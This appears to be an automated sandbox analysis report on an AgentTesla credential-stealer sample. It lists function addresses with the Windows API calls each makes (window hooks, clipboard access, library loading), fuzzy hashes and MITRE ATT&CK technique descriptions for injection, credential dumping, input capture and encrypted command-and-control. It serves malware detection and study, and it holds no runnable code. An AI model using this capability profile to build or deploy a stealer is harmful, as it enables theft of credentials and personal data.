String ID:
API String ID: 716092398-0
Opcode ID: 3a35f28f42a604d3895e9a35edb74640ac3b83b5ccd40a3d54f86870330acdeb
Instruction ID: 6037833c8d086b76adbf9ce6a36cd430d798c7f8e8e9161b35df781b8c1cf9a9
Opcode Fuzzy Hash: 3a35f28f42a604d3895e9a35edb74640ac3b83b5ccd40a3d54f86870330acdeb
Instruction Fuzzy Hash: 9551CEB1D153499FDF15CFA9C884ADEFBB5BF88314F24812AE818AB210D771A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 017B5190, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017B52A2

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c82f9783cbd30f1fb8cd0403b90c612265f715fa6fb27b4dad2fd53354ddd2e8
Instruction ID: 1445d3ca28e7b81a0ef4138ca31d46634b0ab3991db02e93e0a7ca0030e56fb1
Opcode Fuzzy Hash: c82f9783cbd30f1fb8cd0403b90c612265f715fa6fb27b4dad2fd53354ddd2e8
Instruction Fuzzy Hash: A941EFB1D113089FDF14CF99C884ADEFBB5BF88314F24812AE818AB210D770A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 017B6964, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 017B7CF9

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 367486efaa1e0b6e180d782fad2ec950dd3208623c8740f8a28db808b68b9b28
Instruction ID: 6d66d9d11f1432264752d693b2a1e60e3fb311c3152e9697d863d7bc427b8625
Opcode Fuzzy Hash: 367486efaa1e0b6e180d782fad2ec950dd3208623c8740f8a28db808b68b9b28
Instruction Fuzzy Hash: 40412AB59002098FDB18CF59C488BAAFBF5FF88314F15C459D519AB351C734A885CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01447448, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004B), ref: 0144752D

Memory Dump Source

Source File: 00000001.00000002.1031029539.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: false

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 7beab5ddbcfa4913201ac7a15c927022396219bb1d28160d1167e8e6400d3492
Instruction ID: 14366202306941e784ccb764326cdba44d796159433160acfebc642a8d3f2952
Opcode Fuzzy Hash: 7beab5ddbcfa4913201ac7a15c927022396219bb1d28160d1167e8e6400d3492
Instruction Fuzzy Hash: 0D31E771804385CFEB11EFA5F4483EA7FF4AB55358F04806AD445A73A3C7789989CB61

Uniqueness

Uniqueness Score: -1.00%

Function 064DC2F8, Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 064DCAA0

Memory Dump Source

Source File: 00000001.00000002.1034051713.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 48165330b171edab78c5a4ebb65b041e43503e70f7b9ff43437e565157be5b90
Instruction ID: fe733ff8d42a712ab93077254bf2305fc0cf493d6e741460929120f3700feead
Opcode Fuzzy Hash: 48165330b171edab78c5a4ebb65b041e43503e70f7b9ff43437e565157be5b90
Instruction Fuzzy Hash: 7C31E3B0E00248DFDB64CF99D494BDEBBF5AB48314F24806AE405BB390D7B4A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 017B6D78, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017B6DFF

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d1c29b61e23a1e4ce1168e9dbd781c5d9d375d37fb881087b82c126b633c9325
Instruction ID: 5fc041bc67a30a86d665c7e42941fa37623fac820908a6d68048d370289be607
Opcode Fuzzy Hash: d1c29b61e23a1e4ce1168e9dbd781c5d9d375d37fb881087b82c126b633c9325
Instruction Fuzzy Hash: FD21D3B59002589FDB10CFAAD884BDEFBF8FB48324F14842AE954A7350D375A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017B6D73, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017B6DFF

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 20df6beb934644b943efffc5de0595112345f5700a72b68d064b339cd671f4e0
Instruction ID: 86bc75fc1d5dab147baa1517824807e3f8b8433f405043bb27fca62a5c507a2c
Opcode Fuzzy Hash: 20df6beb934644b943efffc5de0595112345f5700a72b68d064b339cd671f4e0
Instruction Fuzzy Hash: 4D21E2B59002089FDB10CFA9D884BEEFBF4FB48324F14802AE954A7350D375A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01441581, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01441603

Memory Dump Source

Source File: 00000001.00000002.1031029539.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: b19c317ecc29ee44f8949f03418a436b2945c5346218af1dd91a3ac31ae7a472
Instruction ID: fbc349b21a0d321d295efc828c71d68dfcf681f96bc4671cddacc303cea04b8a
Opcode Fuzzy Hash: b19c317ecc29ee44f8949f03418a436b2945c5346218af1dd91a3ac31ae7a472
Instruction Fuzzy Hash: 842134B19002088FDB14CFA9C844BEEBBF5BF88314F14842AD459A7350C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017BBDF8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 017BBE82

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 81749da9aef66e2b6e6aa7c7ef1190eb2cd74166292bd284ff8c172ec8cc90bc
Instruction ID: 4d7bf5a9058d7e671531bfd7b628c7924d083778e5b48bce0de3eab803b6d4ca
Opcode Fuzzy Hash: 81749da9aef66e2b6e6aa7c7ef1190eb2cd74166292bd284ff8c172ec8cc90bc
Instruction Fuzzy Hash: D321AC718007598FDB20DFA9D8897DEBFF4FB49324F048429D849A3601C3396509CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01441588, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01441603

Memory Dump Source

Source File: 00000001.00000002.1031029539.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 5aec4a0d7895511967221441fd9dd85ddda3709b4dcf7342efc922503238a712
Instruction ID: 924b520ba717e21cf91b7357e7b4b3ab0c0d22ffd1638dd6619c319bdd0e6678
Opcode Fuzzy Hash: 5aec4a0d7895511967221441fd9dd85ddda3709b4dcf7342efc922503238a712
Instruction Fuzzy Hash: DB2110B59002088FDB14CF9AC844BEEFBF5AB88324F14842AE459A7350CB74A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 014490F8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000,?,0144A389,00000800), ref: 0144A41A

Memory Dump Source

Source File: 00000001.00000002.1031029539.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 377f55c30da155960487e83df8093dbbf8de1a8f940bdb9bbfeb7b6f5d47ba4d
Instruction ID: c37c0d89754e2d2e06488db849a709e06b3fa27f2d017fd50b532eb6a18d8063
Opcode Fuzzy Hash: 377f55c30da155960487e83df8093dbbf8de1a8f940bdb9bbfeb7b6f5d47ba4d
Instruction Fuzzy Hash: 421117B19003489FDB10CF9AC448BDEFBF4EB88314F14842AE555A7350C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 017BBE08, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 017BBE82

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 43b7ca6c1ae929a68ccb224aa4b63406658ae07343327e917c38b8f36d1b4776
Instruction ID: 02f2c3f61dbd3fd1baed977df963a5ca88ccb85bd25acf4867acf61ac1233121
Opcode Fuzzy Hash: 43b7ca6c1ae929a68ccb224aa4b63406658ae07343327e917c38b8f36d1b4776
Instruction Fuzzy Hash: 4711BB719007198FEB20DFA9D8887DEBBF4FB48324F148429D808A3641C7796545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0144A3A8, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000,?,0144A389,00000800), ref: 0144A41A

Memory Dump Source

Source File: 00000001.00000002.1031029539.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 008e299feff7ba59d3ab860a8f8be797782cc64e49dc1c09818eb8e50b8a012e
Instruction ID: 07e00abde149029ecf095f7422304e8d0cfc599c4b16e8c0c5d57a345f537b19
Opcode Fuzzy Hash: 008e299feff7ba59d3ab860a8f8be797782cc64e49dc1c09818eb8e50b8a012e
Instruction Fuzzy Hash: 572103B6D003588FDB14CF9AD488BDEFBF4AB89324F14842AD559A7210C375A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01440838, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?), ref: 014408A7

Memory Dump Source

Source File: 00000001.00000002.1031029539.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 2d329bfbbb982f9f0a6d2b5cc7c1da50cd10d2ee2c220af2a1828329b67873eb
Instruction ID: 2053c80ce903a1199eda3457c99a139572ce598e5ae68eb5a0377571863684bc
Opcode Fuzzy Hash: 2d329bfbbb982f9f0a6d2b5cc7c1da50cd10d2ee2c220af2a1828329b67873eb
Instruction Fuzzy Hash: D81133B1C002199FDB10CF9AC444BDEFBF4BF48324F14812AE858A7240D378A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017B2F44, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 017B4216

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4ea44d69ee6aa0392361b389390ca655eda307397df967320ac9534d244acaf8
Instruction ID: d535866e192f6d636ecdb2ba9e310bad09957f081a0f47c622a3da5bbf2ea994
Opcode Fuzzy Hash: 4ea44d69ee6aa0392361b389390ca655eda307397df967320ac9534d244acaf8
Instruction Fuzzy Hash: 851116B1D047498FDB20CF9AD484BDEFBF4EB88214F11846AD96AB7201C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 064D8E64, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,064DBD07), ref: 064DBD9F

Memory Dump Source

Source File: 00000001.00000002.1034051713.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d21620bc146c579b9fd3d27ce2623a00c87d7041ecf2b8b344cb96a382ff065e
Instruction ID: 71a709dfe80633d4cbc2e0110900342273a11c50f8b749c8263276948e238ea3
Opcode Fuzzy Hash: d21620bc146c579b9fd3d27ce2623a00c87d7041ecf2b8b344cb96a382ff065e
Instruction Fuzzy Hash: 641136B1D002088FCB60CF9AC488BDEFBF4EB88324F11842AD559A7340D774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017B41AC, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 017B4216

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3d62436e54da47e87ac63661e15d6bdcc92b187d0f4e1ed21998502c39651c52
Instruction ID: 7f2d21733224c5b46d05782cdcdc66d593208234ad41b4d7a212779404606d7d
Opcode Fuzzy Hash: 3d62436e54da47e87ac63661e15d6bdcc92b187d0f4e1ed21998502c39651c52
Instruction Fuzzy Hash: 711102B1C006598FDB20CF9AC484BDEFBF4EF89224F14856AD46AA7201C374A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 064D90D4, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 064DC925

Memory Dump Source

Source File: 00000001.00000002.1034051713.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b9243bea19266d99dd1adb03247621efe417857b1addb68d42bf0280af5663fb
Instruction ID: f83a445ce5c0898b7c47c39821fc9545530c93b26c4eddf3c79ddf8cb19a0294
Opcode Fuzzy Hash: b9243bea19266d99dd1adb03247621efe417857b1addb68d42bf0280af5663fb
Instruction Fuzzy Hash: B11103B1D00248CFCB20CF9AD488B9EFBF8EB48224F10846AE559A7640C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0163D450, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1031348309.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d1ffdc8cb3df7d0c22beb80a2bff7e69ca3d8fa0af9849f117ee6feabada2b1
Instruction ID: 4c217b89c8ffc9a0aec2606a5e499642e03781a9bf49d65138d04e083bd1bca8
Opcode Fuzzy Hash: 2d1ffdc8cb3df7d0c22beb80a2bff7e69ca3d8fa0af9849f117ee6feabada2b1
Instruction Fuzzy Hash: 672130B1504200EFDB15DF54D9C0B67BBA5FBC8328F60C5A8E9064B247C336E806CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0163D53C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1031348309.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 159559503aa64d57dce6217d205828f368dce19d13ba287b44171ed495be0d4b
Instruction ID: c698c557960d686ae4f9be95210986c9b1df7e4293b43da10fe4d0aebe3ae5ac
Opcode Fuzzy Hash: 159559503aa64d57dce6217d205828f368dce19d13ba287b44171ed495be0d4b
Instruction Fuzzy Hash: C72125B1504244EFDB05DF54DDC0B26BFA5FBC8328F248569E9054B386C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0174D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1031550766.000000000174D000.00000040.00000001.sdmp, Offset: 0174D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e65bd001bf1463b1ed7a2a0d9d8fc57ae02db37ca17baefe673e69d26ac933d
Instruction ID: a5610d424d29b8298abf28d973ffd999652ec78757aa52703ca4b004b0a3685f
Opcode Fuzzy Hash: 8e65bd001bf1463b1ed7a2a0d9d8fc57ae02db37ca17baefe673e69d26ac933d
Instruction Fuzzy Hash: 5C2137B1504204DFDB25CF94D5C4B26FBA1FB98354F20C5ADD9894B356C37AD807CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0163D44B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1031348309.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2330691ba4d7911e2eb2ecb7cf07cc4824dc234649578f840251faf07cc16324
Instruction ID: ba23799a0683707e582df958b59788d6515a9332300e6f3add4d1493684a8566
Opcode Fuzzy Hash: 2330691ba4d7911e2eb2ecb7cf07cc4824dc234649578f840251faf07cc16324
Instruction Fuzzy Hash: 4B11BE76804280CFDB12CF54D9C4B16BF71FB88328F2886A9D8050B657C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0163D537, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1031348309.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2330691ba4d7911e2eb2ecb7cf07cc4824dc234649578f840251faf07cc16324
Instruction ID: 6683911704c1df02d2f73ae2485e289121295941fe2c1e3bb2b7705b18d5658d
Opcode Fuzzy Hash: 2330691ba4d7911e2eb2ecb7cf07cc4824dc234649578f840251faf07cc16324
Instruction Fuzzy Hash: 1C11BE76404280CFCB12CF54D9C4B56BF72FB88324F2886A9D8094B656C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0174D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1031550766.000000000174D000.00000040.00000001.sdmp, Offset: 0174D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbf2c8cf6e9aa963d3f8e87034f12a02946631990a170d17c82b680eb3c0f293
Instruction ID: ba2d8e0711122e59fda572ae368ed0d0a14709e5561eaae149e21fa74f1e0564
Opcode Fuzzy Hash: bbf2c8cf6e9aa963d3f8e87034f12a02946631990a170d17c82b680eb3c0f293
Instruction Fuzzy Hash: 9C11BE75504280CFCB22CF54D5C4B15FB61FB48314F24C6A9D8494B666C33AD44BCBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report AE-808_RAJEN.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

SMTP Packets

Code Manipulations

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
